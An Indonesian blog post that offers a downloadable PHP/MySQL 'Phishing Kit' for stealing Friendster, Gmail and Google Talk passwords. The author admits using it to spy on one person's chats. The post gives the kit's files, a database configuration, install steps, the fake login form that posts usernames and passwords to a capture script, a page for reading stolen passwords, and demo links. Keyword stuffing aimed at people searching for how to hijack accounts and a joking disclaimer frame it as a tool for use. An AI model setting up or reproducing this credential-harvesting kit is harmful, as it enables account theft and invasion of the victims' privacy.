Phishing = Mancing?

Mancing yang satu ini bukan mancing ikan, tapi mancing duit.
Yuuk mancing, gak usah bawa alat, udah disediain

Mancing yang satu ini sedikit jahat, yaitu “ngising” “phishing”, atau mancing password .
friendster phishing friendster phishing friendster fs phishing gmail phishing cara dapat password friendster cara dapet password friendster fs bajak friendster membajak fs cara lihat password melihat password – untuk google search, hehehe

DOWNLOAD PHISHING KIT (ZIP) (TAR.GZ)

*PERHATIAN: Dosa ditanggung sendiri ya! Wakakakakak*

Curhat dulu yak! *hehehehe*

Pertama kali phishing, tujuan utamaku yaitu untuk dapetin password Google Talk nya “seseorang” *taulah*, soalnya tiap chat di Google Talk direkam sama google. Jadi bisa tau deh kalau dia cetingannya sama siapa aja n ngapain aja. *memang sedikit jahat*. Dulu, phishingnya sederhana, cuman pake halaman login palsu + database, satu halaman. Sekarang aku pisah-pisah halamnnya, dan jadilah sebuah “Kit” untuk phishing . Aku namain “Phishing Kit“. Tekning phishing ini memakai php + mysql, gak seperti teknik yang pake php + mail().

“Phishing Kit” isinya:
1. main.php *mesin phishingnya*
2. login.html *contoh halaman login palsu, elek banget tapi *
3. baca.php *untuk baca password tangkapan*
4. fslogin.php *untuk friendster phishing, halaman loginnya persis*

Alat dan Bahan:
1. Daftar database gratisan, salah satunya bisa di dbservers.co.uk. *kalau webhost bisa mysql, ini gak usah*
2. Daftar webhosting gratisan yang dukung php + mysql atau akses eksternal database. Misalnya webhost ini.
3. Bikin database, contoh namanya “phishing”
3. Extract Phishing Kit!

Cara Memakai:
1. Edit main.php dan baca.php. Isi informasi database, contoh:

$db = array (
  'host'        => 'mysql1.dbservers.co.uk',
  'user'        => 'inov',
  'passwd'      => 'rahasia',
  'dbname'      => 'phishing'
);

2. Kalu pengaturan database sudah bener, INSTALL Phishing Kit dengan cara meng-uncomment fungsi create_table ();. Setelah itu run script 1X. Lalu fungsi create table dihapus atau dicomment kembali.

/* Untuk INSTALL, hilangkan komentar `//` pada create_table (); */
// create_table ();
/* Habis install, create table boleh di unkomen, atau didelet */

Menjadi tanpa comment:

/* Untuk INSTALL, hilangkan komentar `//` pada create_table (); */
create_table ();
/* Habis install, create table boleh di uncomment, atau didelet */

Jalanin script main.php satu kali, lalu baris fungsi create table didelet:

/* Untuk INSTALL, hilangkan komentar `//` pada create_table (); */
/* Habis install, create table boleh di unkomen, atau didelet */

3. Selesai! Coba jalankan login.html atau fslogin.php untuk ngetes

Cara Kerja:

Format Form:
Format form, paling nggak ada 2 input text *”uname” dan “upass”*, dan 1 submit button. Method form POST action ke main.php.

<object><form method="post" action="main.php">
  Username: <input type="text" name="uname" />
  Password: <input type="password" name="upass" />
  <input type="submit" value="Submit" />
</form></object>

Ini format form yang paling sederhana, contoh lain ada di dalam paket, yaitu “login.html”, dan “fslogin.php” yang bener2 persis dengan halaman login friendster.

Sekian (=

Demo:
http://ynov.co.cc/quake/login.html
http://ynov.co.cc/quake/friendster.com/login.php
http://ynov.co.cc/quake/fslogin.php *no. 2*
http://ynov.co.cc/quake/baca.php

Bahkan untuk friendster, umpan untuk mancing ikan phising bisa lewat comment menggunakan form seperti ini: (source)

DOWNLOAD PHISHING KIT (ZIP) (TAR.GZ)

Catatatan!
Beberapa webhosting menganggap file .html = .php. File berformat .html akan diproses dengan php. Tag < ?xml version=”1.0″ encoding=”utf-8″? > pada login.html akan dibaca sebagai tag php, dan menghasilkan error. Jadi hapus aja tag itu

Akhir kata… Beware of Phishing!